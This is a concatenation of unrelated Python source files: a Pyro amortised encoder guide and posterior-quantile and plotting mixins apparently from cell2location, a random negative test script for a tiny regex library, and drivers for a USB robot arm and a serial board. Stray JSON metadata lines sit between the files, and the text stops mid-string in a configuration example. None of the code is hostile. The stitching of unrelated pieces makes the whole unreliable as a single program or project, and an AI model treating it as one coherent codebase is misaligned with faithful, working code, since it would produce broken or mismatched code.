Pyro model args
kwargs
Pyro model kwargs
"""
in_names = self.amortised_plate_sites["input"]
x_in = [kwargs[i] if i in kwargs.keys() else args[i] for i in in_names]
# apply data transform before passing to NN
in_transforms = self.amortised_plate_sites["input_transform"]
x_in = [in_transforms[i](x) for i, x in enumerate(x_in)]
if "single" in self.encoder_mode:
# encode with a single encoder
res = self.one_encoder(*x_in)
if "multiple" in self.encoder_mode:
# when there is a second layer of multiple encoders fetch encoders and encode data
x_in[0] = res
res = {
name: deep_getattr(self.multiple_encoders, name)(*x_in)
for name, site in self.prototype_trace.iter_stochastic_nodes()
}
else:
# when there are multiple encoders fetch encoders and encode data
res = {
name: deep_getattr(self.multiple_encoders, name)(*x_in)
for name, site in self.prototype_trace.iter_stochastic_nodes()
}
return res
def forward(self, *args, **kwargs):
"""
An automatic guide with the same ``*args, **kwargs`` as the base ``model``.
.. note:: This method is used internally by :class:`~torch.nn.Module`.
Users should instead use :meth:`~torch.nn.Module.__call__`.
:return: A dict mapping sample site name to sampled value.
:rtype: dict
"""
# if we've never run the model before, do so now so we can inspect the model structure
if self.prototype_trace is None:
self._setup_prototype(*args, **kwargs)
encoded_hidden = self.encode(*args, **kwargs)
plates = self._create_plates(*args, **kwargs)
result = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
transform = biject_to(site["fn"].support)
with ExitStack() as stack:
for frame in site["cond_indep_stack"]:
if frame.vectorized:
stack.enter_context(plates[frame.name])
site_loc, site_scale = self._get_loc_and_scale(name, encoded_hidden)
unconstrained_latent = pyro.sample(
name + "_unconstrained",
dist.Normal(
site_loc,
site_scale,
).to_event(self._event_dims[name]),
infer={"is_auxiliary": True},
)
value = transform(unconstrained_latent)
if pyro.poutine.get_mask() is False:
log_density = 0.0
else:
log_density = transform.inv.log_abs_det_jacobian(
value,
unconstrained_latent,
)
log_density = sum_rightmost(
log_density,
log_density.dim() - value.dim() + site["fn"].event_dim,
)
delta_dist = dist.Delta(
value,
log_density=log_density,
event_dim=site["fn"].event_dim,
)
result[name] = pyro.sample(name, delta_dist)
return result
@torch.no_grad()
def median(self, *args, **kwargs):
"""
Returns the posterior median value of each latent variable.
:return: A dict mapping sample site name to median tensor.
:rtype: dict
"""
encoded_latent = self.encode(*args, **kwargs)
medians = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
site_loc, _ = self._get_loc_and_scale(name, encoded_latent)
median = biject_to(site["fn"].support)(site_loc)
if median is site_loc:
median = median.clone()
medians[name] = median
return medians
@torch.no_grad()
def quantiles(self, quantiles, *args, **kwargs):
"""
        Returns posterior quantiles of each latent variable. Example::
print(guide.quantiles([0.05, 0.5, 0.95]))
:param quantiles: A list of requested quantiles between 0 and 1.
:type quantiles: torch.Tensor or list
:return: A dict mapping sample site name to a list of quantile values.
:rtype: dict
"""
encoded_latent = self.encode(*args, **kwargs)
results = {}
for name, site in self.prototype_trace.iter_stochastic_nodes():
site_loc, site_scale = self._get_loc_and_scale(name, encoded_latent)
site_quantiles = torch.tensor(quantiles, dtype=site_loc.dtype, device=site_loc.device)
site_quantiles_values = dist.Normal(site_loc, site_scale).icdf(site_quantiles)
constrained_site_quantiles = biject_to(site["fn"].support)(site_quantiles_values)
results[name] = constrained_site_quantiles
return results
```
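As a quick illustration of the `amortised_plate_sites` argument described in the docstring above, here is a sketch of how such a dictionary might be assembled; the site names, dimensions and encoder settings are hypothetical and depend on the concrete Pyro model:
```python
import torch

# hypothetical sites and dimensions; they must mirror the variables of the actual model
amortised_plate_sites = {
    "name": "obs_plate",
    "input": [0],                       # indexes of model args fed to the encoder
    "input_transform": [torch.log1p],   # applied element-wise before the NN
    "sites": {
        "w_sf": 30,      # e.g. number of factors per location
        "l_s_add": 1,
    },
}
# guide = AutoNormalEncoder(model, amortised_plate_sites=amortised_plate_sites,
#                           n_in=n_genes, encoder_mode="single")
```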
#### File: models/base/_pyro_mixin.py
```python
from datetime import date
from functools import partial
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pyro
import torch
from pyro import poutine
from pyro.infer.autoguide import AutoNormal, init_to_mean
from scipy.sparse import issparse
from scvi import _CONSTANTS
from scvi.data._anndata import get_from_registry
from scvi.dataloaders import AnnDataLoader
from scvi.model._utils import parse_use_gpu_arg
from ...distributions.AutoNormalEncoder import AutoGuideList, AutoNormalEncoder
def init_to_value(site=None, values={}):
if site is None:
return partial(init_to_value, values=values)
if site["name"] in values:
return values[site["name"]]
else:
return init_to_mean(site)
class AutoGuideMixinModule:
"""
This mixin class provides methods for:
- initialising standard AutoNormal guides
- initialising amortised guides (AutoNormalEncoder)
- initialising amortised guides with special additional inputs
"""
def _create_autoguide(
self,
model,
amortised,
encoder_kwargs,
data_transform,
encoder_mode,
init_loc_fn=init_to_mean,
n_cat_list: list = [],
encoder_instance=None,
):
if not amortised:
_guide = AutoNormal(
model,
init_loc_fn=init_loc_fn,
create_plates=model.create_plates,
)
else:
encoder_kwargs = encoder_kwargs if isinstance(encoder_kwargs, dict) else dict()
n_hidden = encoder_kwargs["n_hidden"] if "n_hidden" in encoder_kwargs.keys() else 200
init_param_scale = (
encoder_kwargs["init_param_scale"] if "init_param_scale" in encoder_kwargs.keys() else 1 / 50
)
if "init_param_scale" in encoder_kwargs.keys():
del encoder_kwargs["init_param_scale"]
amortised_vars = self.list_obs_plate_vars
_guide = AutoGuideList(model, create_plates=model.create_plates)
_guide.append(
AutoNormal(
pyro.poutine.block(model, hide=list(amortised_vars["sites"].keys())),
init_loc_fn=init_loc_fn,
)
)
if isinstance(data_transform, np.ndarray):
# add extra info about gene clusters to the network
self.register_buffer("gene_clusters", torch.tensor(data_transform.astype("float32")))
n_in = model.n_vars + data_transform.shape[1]
data_transform = self.data_transform_clusters()
elif data_transform == "log1p":
# use simple log1p transform
data_transform = torch.log1p
n_in = self.model.n_vars
elif (
isinstance(data_transform, dict)
and "var_std" in list(data_transform.keys())
and "var_mean" in list(data_transform.keys())
):
# use data transform by scaling
n_in = model.n_vars
self.register_buffer(
"var_mean",
torch.tensor(data_transform["var_mean"].astype("float32").reshape((1, n_in))),
)
self.register_buffer(
"var_std",
torch.tensor(data_transform["var_std"].astype("float32").reshape((1, n_in))),
)
data_transform = self.data_transform_scale()
else:
# use custom data transform
data_transform = data_transform
n_in = model.n_vars
if len(amortised_vars["input"]) >= 2:
encoder_kwargs["n_cat_list"] = n_cat_list
amortised_vars["input_transform"][0] = data_transform
_guide.append(
AutoNormalEncoder(
pyro.poutine.block(model, expose=list(amortised_vars["sites"].keys())),
amortised_plate_sites=amortised_vars,
n_in=n_in,
n_hidden=n_hidden,
init_param_scale=init_param_scale,
encoder_kwargs=encoder_kwargs,
encoder_mode=encoder_mode,
encoder_instance=encoder_instance,
)
)
return _guide
def _data_transform_clusters(self):
def _data_transform(x):
return torch.log1p(torch.cat([x, x @ self.gene_clusters], dim=1))
return _data_transform
def _data_transform_scale(self):
def _data_transform(x):
# return (x - self.var_mean) / self.var_std
return x / self.var_std
return _data_transform
class QuantileMixin:
"""
This mixin class provides methods for:
- computing median and quantiles of the posterior distribution using both direct and amortised inference
"""
def _optim_param(
self,
lr: float = 0.01,
autoencoding_lr: float = None,
clip_norm: float = 200,
module_names: list = ["encoder", "hidden2locs", "hidden2scales"],
):
# TODO implement custom training method that can use this function.
# create function which fetches different lr for autoencoding guide
def optim_param(module_name, param_name):
# detect variables in autoencoding guide
if autoencoding_lr is not None and np.any([n in module_name + "." + param_name for n in module_names]):
return {
"lr": autoencoding_lr,
# limit the gradient step from becoming too large
"clip_norm": clip_norm,
}
else:
return {
"lr": lr,
# limit the gradient step from becoming too large
"clip_norm": clip_norm,
}
return optim_param
@torch.no_grad()
def _posterior_quantile_amortised(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter, separating local (minibatch) variable
and global variables, which is necessary when performing amortised inference.
Note for developers: requires model class method which lists observation/minibatch plate
variables (self.module.model.list_obs_plate_vars()).
Parameters
----------
q
quantile to compute
batch_size
number of observations per batch
use_gpu
Bool, use gpu?
Returns
-------
dictionary {variable_name: posterior median}
"""
gpus, device = parse_use_gpu_arg(use_gpu)
self.module.eval()
train_dl = AnnDataLoader(self.adata, shuffle=False, batch_size=batch_size)
# sample local parameters
i = 0
for tensor_dict in train_dl:
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
if i == 0:
means = self.module.guide.quantiles([q], *args, **kwargs)
means = {
k: means[k].cpu().numpy()
for k in means.keys()
if k in self.module.model.list_obs_plate_vars()["sites"]
}
# find plate dimension
trace = poutine.trace(self.module.model).get_trace(*args, **kwargs)
# print(trace.nodes[self.module.model.list_obs_plate_vars()['name']])
obs_plate = {
name: site["cond_indep_stack"][0].dim
for name, site in trace.nodes.items()
if site["type"] == "sample"
if any(f.name == self.module.model.list_obs_plate_vars()["name"] for f in site["cond_indep_stack"])
}
else:
means_ = self.module.guide.quantiles([q], *args, **kwargs)
means_ = {
k: means_[k].cpu().numpy()
for k in means_.keys()
if k in list(self.module.model.list_obs_plate_vars()["sites"].keys())
}
means = {
k: np.concatenate([means[k], means_[k]], axis=list(obs_plate.values())[0]) for k in means.keys()
}
i += 1
# sample global parameters
tensor_dict = next(iter(train_dl))
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
global_means = self.module.guide.quantiles([q], *args, **kwargs)
global_means = {
k: global_means[k].cpu().numpy()
for k in global_means.keys()
if k not in list(self.module.model.list_obs_plate_vars()["sites"].keys())
}
for k in global_means.keys():
means[k] = global_means[k]
self.module.to(device)
return means
@torch.no_grad()
def _posterior_quantile(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter pyro models trained without amortised inference.
Parameters
----------
q
quantile to compute
use_gpu
Bool, use gpu?
Returns
-------
dictionary {variable_name: posterior median}
"""
self.module.eval()
gpus, device = parse_use_gpu_arg(use_gpu)
train_dl = AnnDataLoader(self.adata, shuffle=False, batch_size=batch_size)
# sample global parameters
tensor_dict = next(iter(train_dl))
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
means = self.module.guide.quantiles([q], *args, **kwargs)
means = {k: means[k].cpu().detach().numpy() for k in means.keys()}
return means
def posterior_quantile(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter.
Parameters
----------
q
quantile to compute
use_gpu
Returns
-------
"""
if self.module.is_amortised:
return self._posterior_quantile_amortised(q=q, batch_size=batch_size, use_gpu=use_gpu)
else:
return self._posterior_quantile(q=q, batch_size=batch_size, use_gpu=use_gpu)
class PltExportMixin:
r"""
    This mixin class provides methods for common plotting tasks and data export.
"""
@staticmethod
def plot_posterior_mu_vs_data(mu, data):
r"""Plot expected value of the model (e.g. mean of NB distribution) vs observed data
:param mu: expected value
:param data: data value
"""
plt.hist2d(
np.log10(data.flatten() + 1),
np.log10(mu.flatten() + 1),
bins=50,
norm=matplotlib.colors.LogNorm(),
)
plt.gca().set_aspect("equal", adjustable="box")
plt.xlabel("Data, log10")
plt.ylabel("Posterior expected value, log10")
plt.title("Reconstruction accuracy")
plt.tight_layout()
def plot_history(self, iter_start=0, iter_end=-1, ax=None):
r"""Plot training history
Parameters
----------
iter_start
omit initial iterations from the plot
iter_end
omit last iterations from the plot
ax
matplotlib axis
"""
if ax is None:
ax = plt
ax.set_xlabel = plt.xlabel
            ax.set_ylabel = plt.ylabel
            ax.set_xlim = plt.xlim
if iter_end == -1:
iter_end = len(self.history_["elbo_train"])
ax.plot(
self.history_["elbo_train"].index[iter_start:iter_end],
np.array(self.history_["elbo_train"].values.flatten())[iter_start:iter_end],
label="train",
)
ax.legend()
        ax.set_xlim(0, len(self.history_["elbo_train"]))
ax.set_xlabel("Training epochs")
ax.set_ylabel("-ELBO loss")
plt.tight_layout()
def _export2adata(self, samples):
r"""
Export key model variables and samples
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
Returns
-------
Updated dictionary with additional details is saved to ``adata.uns['mod']``.
"""
# add factor filter and samples of all parameters to unstructured data
results = {
"model_name": str(self.module.__class__.__name__),
"date": str(date.today()),
"factor_filter": list(getattr(self, "factor_filter", [])),
"factor_names": list(self.factor_names_),
"var_names": self.adata.var_names.tolist(),
"obs_names": self.adata.obs_names.tolist(),
"post_sample_means": samples["post_sample_means"],
"post_sample_stds": samples["post_sample_stds"],
"post_sample_q05": samples["post_sample_q05"],
"post_sample_q95": samples["post_sample_q95"],
}
return results
def sample2df_obs(
self,
samples: dict,
site_name: str = "w_sf",
summary_name: str = "means",
name_prefix: str = "cell_abundance",
):
"""Export posterior distribution summary for observation-specific parameters
(e.g. spatial cell abundance) as Pandas data frame
(means, 5%/95% quantiles or sd of posterior distribution).
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
site_name
name of the model parameter to be exported
summary_name
posterior distribution summary to return ['means', 'stds', 'q05', 'q95']
name_prefix
prefix to add to column names (f'{summary_name}{name_prefix}_{site_name}_{self\.factor_names_}')
Returns
-------
Pandas data frame corresponding to either means, 5%/95% quantiles or sd of the posterior distribution
"""
return pd.DataFrame(
samples[f"post_sample_{summary_name}"].get(site_name, None),
index=self.adata.obs_names,
columns=[f"{summary_name}{name_prefix}_{site_name}_{i}" for i in self.factor_names_],
)
def sample2df_vars(
self,
samples: dict,
site_name: str = "gene_factors",
summary_name: str = "means",
name_prefix: str = "",
):
r"""Export posterior distribution summary for variable-specific parameters as Pandas data frame
(means, 5%/95% quantiles or sd of posterior distribution).
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
site_name
name of the model parameter to be exported
summary_name
posterior distribution summary to return ('means', 'stds', 'q05', 'q95')
name_prefix
prefix to add to column names (f'{summary_name}{name_prefix}_{site_name}_{self\.factor_names_}')
Returns
-------
Pandas data frame corresponding to either means, 5%/95% quantiles or sd of the posterior distribution
"""
return pd.DataFrame(
samples[f"post_sample_{summary_name}"].get(site_name, None),
columns=self.adata.var_names,
index=[f"{summary_name}{name_prefix}_{site_name}_{i}" for i in self.factor_names_],
).T
def plot_QC(self, summary_name: str = "means", use_n_obs: int = 1000):
"""
Show quality control plots:
1. Reconstruction accuracy to assess if there are any issues with model training.
The plot should be roughly diagonal, strong deviations signal problems that need to be investigated.
Plotting is slow because expected value of mRNA count needs to be computed from model parameters. Random
observations are used to speed up computation.
Parameters
----------
summary_name
posterior distribution summary to use ('means', 'stds', 'q05', 'q95')
Returns
-------
"""
if getattr(self, "samples", False) is False:
raise RuntimeError("self.samples is missing, please run self.export_posterior() first")
if use_n_obs is not None:
ind_x = np.random.choice(self.adata.n_obs, np.min((use_n_obs, self.adata.n_obs)), replace=False)
else:
ind_x = None
self.expected_nb_param = self.module.model.compute_expected(
self.samples[f"post_sample_{summary_name}"], self.adata, ind_x=ind_x
)
x_data = get_from_registry(self.adata, _CONSTANTS.X_KEY)[ind_x, :]
if issparse(x_data):
x_data = np.asarray(x_data.toarray())
self.plot_posterior_mu_vs_data(self.expected_nb_param["mu"], x_data)
```
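Both quantile helpers above ultimately delegate to `guide.quantiles`, which evaluates the inverse CDF of a Normal at the requested probabilities in unconstrained space. A torch-only sketch of that core step, with made-up loc/scale values:
```python
import torch
from torch.distributions import Normal

loc = torch.tensor([0.0, 1.0])              # per-site posterior means
scale = torch.tensor([1.0, 2.0])            # per-site posterior standard deviations
q = torch.tensor([[0.05], [0.50], [0.95]])  # requested probabilities

print(Normal(loc, scale).icdf(q))           # one row of quantile values per probability
```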
#### File: cell2location/plt/plot_in_1D.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_absolute_abundances_1D(
adata_sp,
roi_subset=False,
saving=False,
celltype_subset=False,
scaling=0.15,
power=1,
pws=[0, 0, 100, 500, 1000, 3000, 6000],
dimName="VCDepth",
xlab="Cortical Depth",
colourCode=None,
figureSize=(12, 8),
):
r"""
Plot absolute abundance of celltypes in a dotplot across 1 dimension
:param adata_sp: anndata object for spatial data with celltype abundance included in .obs (this is returned by running cell2location first)
:param celltype_subset: list of a subset of cell type names to be plotted
:param slide&radial_position: if wanting to plot only data from one slide + one radial position, include in these parameters
:param cell_types: parameter for only plotting specific cell types where column names in adata_sp.obs are meanSpot[celltype] format
:param roi_subset: optionally a boolean for only using part of the data in adata_sp (corresponding to a specific ROI)
:param saving: optionally a string value, which will result in the plot to be saved under this name
:param scaling: how dot size should scale linearly with abundance values, default 0.15
:param power: how dot size should scale non-linearly with abundance values, default 1 (no non-linear scaling)
:param pws: which abundance values to show in the legend
:param dimName: the name of the dimensions in adata_sp.obs to use for plotting
:param xlab: the x-axis label for the plot
:param colourCode: optionally a dictionary mapping cell type names to colours
:param figureSize: size of the figure
"""
SMALL_SIZE = 18
MEDIUM_SIZE = 18
BIGGER_SIZE = 18
plt.rc("font", size=SMALL_SIZE) # controls default text sizes
plt.rc("axes", titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc("axes", labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc("xtick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("ytick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("legend", fontsize=SMALL_SIZE) # legend fontsize
plt.rc("figure", titlesize=BIGGER_SIZE) # fontsize of the figure title
def subset_obs_column(adata, celltype):
obs_columns = adata.obs.loc[:, [celltype in x.split("mean_spot_factors") for x in adata.obs.columns]]
columns_names = obs_columns.columns
return columns_names
def subset_anndata(adata, celltype, dimName):
adata_subset = adata.copy()
names = subset_obs_column(adata, celltype)
adata_subset.obs = adata_subset.obs.loc[:, names]
adata_subset.obs[dimName] = adata.obs[dimName]
adata_subset.obs["Radial_position"] = adata.obs["Radial_position"]
adata_subset.obs["slide"] = adata.obs["slide"]
return adata_subset
if celltype_subset:
adata_sp = subset_anndata(adata_sp, celltype_subset, dimName)
celltypes = [
x.split("mean_spot_factors")[-1] for x in adata_sp.obs.columns if len(x.split("mean_spot_factors")) == 2
]
abundances = adata_sp.obs.loc[:, [len(x.split("mean_spot_factors")) == 2 for x in adata_sp.obs.columns]]
if roi_subset:
celltypesForPlot = np.repeat(celltypes, sum(roi_subset))
vcForPlot = np.array([adata_sp.obs[dimName].loc[roi_subset] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j].loc[roi_subset] for j in range(len(celltypes))])
else:
celltypesForPlot = np.repeat(celltypes, np.shape(adata_sp)[0])
vcForPlot = np.array([adata_sp.obs[dimName] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j] for j in range(len(celltypes))])
if type(colourCode) is dict:
colourCode = pd.DataFrame(data=colourCode.values(), index=colourCode.keys(), columns=["Colours"])
else:
colourCode = pd.DataFrame(data="black", index=celltypes, columns=["Colours"])
coloursForPlot = np.array(colourCode.loc[np.array(celltypesForPlot), "Colours"])
plt.figure(figsize=(figureSize))
plt.scatter(
vcForPlot,
celltypesForPlot,
s=(1 - np.amin(countsForPlot * scaling) + countsForPlot * scaling) ** power,
c=coloursForPlot,
)
plt.xlabel(xlab)
# make a legend:
for pw in pws:
plt.scatter(
[], [], s=((1 - np.amin(countsForPlot * scaling) + pw * scaling)) ** power, c="black", label=str(pw)
)
h, leng = plt.gca().get_legend_handles_labels()
plt.legend(
h[1:],
leng[1:],
labelspacing=1.2,
title="Total Number",
borderpad=1,
frameon=True,
framealpha=0.6,
edgecolor="k",
facecolor="w",
bbox_to_anchor=(1.55, 0.5),
)
plt.tight_layout()
if saving:
plt.savefig(saving)
def plot_density_1D(
adata_sp,
subset=None,
saving=False,
scaling=0.15,
power=1,
pws=[0, 0, 100, 500, 1000, 3000, 6000, 10000],
dimName="VCDepth",
areaName="AOISurfaceArea",
xlab="Cortical Depth",
colourCode=None,
figureSize=(12, 8),
):
r"""Plot density of celltypes in a dotplot across 1 dimension
:param adata_sp: anndata object for spatial data with celltype abundance included in .obs (this is returned by running cell2location first)
:param subset: optionally a boolean for only using part of the data in adata_sp
:param saving: optionally a string value, which will result in the plot to be saved under this name
:param scaling: how dot size should scale linearly with abundance values, default 0.15
:param power: how dot size should scale non-linearly with abundance values, default 1 (no non-linear scaling)
:param pws: which abundance values to show in the legend
:param dimName: the name of the column in adata_sp.obs that contains the dimension used for plotting
:param areaName: the name of the column in adata_sp.obs that contain the area of each ROI (assumed to be square micrometer)
:param xlab: the x-axis label for the plot
:param colourCode: optionally a dictionary mapping cell type names to colours
:param figureSize: size of the figure
"""
SMALL_SIZE = 18
MEDIUM_SIZE = 18
BIGGER_SIZE = 18
plt.rc("font", size=SMALL_SIZE) # controls default text sizes
plt.rc("axes", titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc("axes", labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc("xtick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("ytick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("legend", fontsize=SMALL_SIZE) # legend fontsize
plt.rc("figure", titlesize=BIGGER_SIZE) # fontsize of the figure title
roi_area = np.array(adata_sp.obs[areaName])
celltypes = [
x.split("mean_spot_factors")[-1] for x in adata_sp.obs.columns if len(x.split("mean_spot_factors")) == 2
]
abundances = adata_sp.obs.loc[:, [len(x.split("mean_spot_factors")) == 2 for x in adata_sp.obs.columns]]
if subset:
celltypesForPlot = np.repeat(celltypes, sum(subset))
vcForPlot = np.array([adata_sp.obs[dimName].loc[subset] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array(
[abundances.iloc[:, j].loc[subset] / roi_area[subset] * 10 ** 6 for j in range(len(celltypes))]
)
else:
celltypesForPlot = np.repeat(celltypes, np.shape(adata_sp)[0])
vcForPlot = np.array([adata_sp.obs[dimName] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j] / roi_area * 10 ** 6 for j in range(len(celltypes))])
if type(colourCode) is dict:
colourCode = pd.DataFrame(data=colourCode.values(), index=colourCode.keys(), columns=["Colours"])
else:
colourCode = pd.DataFrame(data="black", index=celltypes, columns=["Colours"])
coloursForPlot = np.array(colourCode.loc[np.array((celltypesForPlot)), "Colours"])
plt.figure(figsize=(figureSize))
plt.scatter(
vcForPlot,
celltypesForPlot,
s=((1 - np.amin(countsForPlot * scaling) + countsForPlot * scaling)) ** power,
c=coloursForPlot,
)
plt.xlabel(xlab)
# make a legend:
for pw in pws:
plt.scatter(
[], [], s=((1 - np.amin(countsForPlot * scaling) + pw * scaling)) ** power, c="black", label=str(pw)
)
h, leng = plt.gca().get_legend_handles_labels()
plt.legend(
h[1:],
leng[1:],
labelspacing=1.2,
title="Density ($cells/mm^2$)",
borderpad=1,
frameon=True,
framealpha=0.6,
edgecolor="k",
facecolor="w",
bbox_to_anchor=(1, 0.9),
)
plt.tight_layout()
if saving:
plt.savefig(saving)
``` |
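The dot sizes in both plots follow `(1 - min(counts * scaling) + counts * scaling) ** power`. A small numeric check of that formula with hypothetical abundance values:
```python
import numpy as np

counts = np.array([0.0, 100.0, 500.0, 1000.0])  # hypothetical abundance values
scaling, power = 0.15, 1
sizes = (1 - np.amin(counts * scaling) + counts * scaling) ** power
print(sizes)  # [  1.  16.  76. 151.]
```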
{
"source": "jjhoo/otp",
"score": 3
} |
#### File: tiny_regex_c/scripts/regex_test_neg.py
```python
import re
import sys
import string
import random
from subprocess import call
prog = "./tests/test_rand_neg"
if len(sys.argv) < 2:
print("")
print("usage: %s pattern [nrepeat]" % sys.argv[0])
print(" where [nrepeat] is optional")
print("")
sys.exit(-1)
own_prog = sys.argv[0]
pattern = sys.argv[1]
if len(sys.argv) > 2:
ntests = int(sys.argv[2])
else:
ntests = 10
nfails = 0
repeats = ntests
try:
repeats = int(sys.argv[2])
except:
pass
sys.stdout.write("%-35s" % (" pattern '%s': " % pattern))
def gen_no_match(pattern, minlen=1, maxlen=50, maxattempts=500):
nattempts = 0
while True:
nattempts += 1
ret = "".join([random.choice(string.printable) for i in range(random.Random().randint(minlen, maxlen))])
if re.findall(pattern, ret) == []:
return ret
if nattempts >= maxattempts:
raise Exception("Could not generate string that did not match the regex pattern '%s' after %d attempts" % (pattern, nattempts))
while repeats >= 0:
try:
repeats -= 1
example = gen_no_match(pattern)
#print("%s %s %s" % (prog, pattern, example))
ret = call([prog, "\"%s\"" % pattern, "\"%s\"" % example])
if ret != 0:
escaped = repr(example) # escapes special chars for better printing
print(" FAIL : matches %s unexpectedly [%s]." % (escaped, ", ".join([("0x%02x" % ord(e)) for e in example]) ))
nfails += 1
except:
#import traceback
#print("EXCEPTION!")
#raw_input(traceback.format_exc())
ntests -= 1
repeats += 1
#nfails += 1
sys.stdout.write("%4d/%d tests succeeded \n" % (ntests - nfails, ntests))
#print("")
``` |
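The heart of the script is `gen_no_match`, which keeps sampling random printable strings until one fails to match the pattern. A condensed, self-contained version for quick experimentation (parameters trimmed for brevity):
```python
import random
import re
import string

def gen_no_match(pattern, minlen=1, maxlen=20):
    # keep sampling random printable strings until one does not match the pattern
    while True:
        s = "".join(random.choice(string.printable) for _ in range(random.randint(minlen, maxlen)))
        if re.findall(pattern, s) == []:
            return s

s = gen_no_match(r"[0-9]+")
assert re.findall(r"[0-9]+", s) == []
print(repr(s))
```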
{
"source": "jjhritz/letsrobot",
"score": 3
} |
#### File: letsrobot/hardware/owi_arm.py
```python
import usb.core, usb.util, time, sys
import logging
log = logging.getLogger('hardware/owi_arm')
# led pesistence variable
led = 0
RoboArm = 0
def setup(robot_config):
#Allocate the name 'RoboArm' to the USB device
global RoboArm
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
#Check if the arm is detected and warn if not
if RoboArm is None:
log.critical("USB Arm not found")
sys.exit()
def CtrlTransfer(a, b, c, d, e, f):
global led
error = 0
while True :
try:
e[2] = led
RoboArm.ctrl_transfer(a, b, c, d, e, f)
break
except:
error += 1
log.error("USB timeout!")
time.sleep(0.1)
if error == 5:
sys.exit()
pass
#Define a procedure to execute each movement
def MoveArm(Duration, ArmCmd):
#Start the movement
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd=[0,0,0]
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
def move(args):
global led
command = args['command']
if command == 'L':
MoveArm(0.15, [0,2,0]) # Rotate counter-clockwise
if command == 'R':
MoveArm(0.15, [0,1,0]) # Rotate clockwise
if command == 'B':
MoveArm(0.15, [128,0,0]) # Rotate Shoulder down
if command == 'F':
MoveArm(0.15, [64,0,0]) # Rotate Shoulder up
if command == 'U':
MoveArm(0.15, [16,0,0]) # Rotate Elbow up
if command == 'D':
MoveArm(0.15, [32,0,0]) # Rotate Elbow down
if command == 'W':
MoveArm(0.15, [4,0,0]) # Rotate Wrist Up
if command == 'S':
MoveArm(0.15, [8,0,0]) # Rotate Wrist Down
if command == 'C':
MoveArm(0.15, [2,0,0]) # Open Gripper
if command == 'V':
MoveArm(0.15, [1,0,0]) # Close Gripper
if command == '1':
        led = 1
MoveArm(0.15, [0,0,1]) # LED On
if command == '0':
        led = 0
MoveArm(0.15, [0,0,0]) # LED Off
```
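`move()` maps single-letter commands onto 3-byte USB control packets (`[byte1, byte2, led]`). A hypothetical driving loop, assuming this file is importable as `owi_arm` and the arm was found by `setup()`:
```python
# hypothetical usage; the module name owi_arm is an assumption
import time
import owi_arm

owi_arm.setup(robot_config=None)           # robot_config is not used by setup() above
for cmd in ['1', 'F', 'U', 'C', '0']:      # LED on, shoulder up, elbow up, open gripper, LED off
    owi_arm.move({'command': cmd})
    time.sleep(0.2)
```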
#### File: letsrobot/hardware/serial_board.py
```python
import serial
import sys
import logging
log = logging.getLogger('hardware/serial_board')
ser = None
def sendSerialCommand(ser, command):
log.info("serial send: ", str(command.lower()))
ser.write(command.lower().encode('utf8') + b"\r\n") # write a string
ser.flush()
def setup(robot_config):
global ser
serial_device = robot_config.get('serial', 'serial_device')
serialBaud = robot_config.getint('serial', 'baud_rate')
# initialize serial connection
try:
        ser = serial.Serial(serial_device, serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port")
try:
ser = serial.Serial('/dev/ttyACM0', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyACM0")
try:
ser = serial.Serial('/dev/ttyUSB0', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB0")
try:
ser = serial.Serial('/dev/ttyUSB1', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB1")
try:
ser = serial.Serial('/dev/ttyUSB2', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB2")
if ser is None:
log.critical("error: could not find any valid serial port")
sys.exit()
log.info("Serial Connected")
log.debug("port:", ser.name)
log.debug("baud:", serialBaud)
return(ser)
def move(args):
command = args['command']
sendSerialCommand(ser, command)
```
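`setup()` expects a `[serial]` section in the robot config. A minimal sketch of that section using `configparser`; the device path and baud rate below are only examples:
```python
from configparser import ConfigParser

# example values only; the real config lives in the controller's config file
robot_config = ConfigParser()
robot_config.read_string("""
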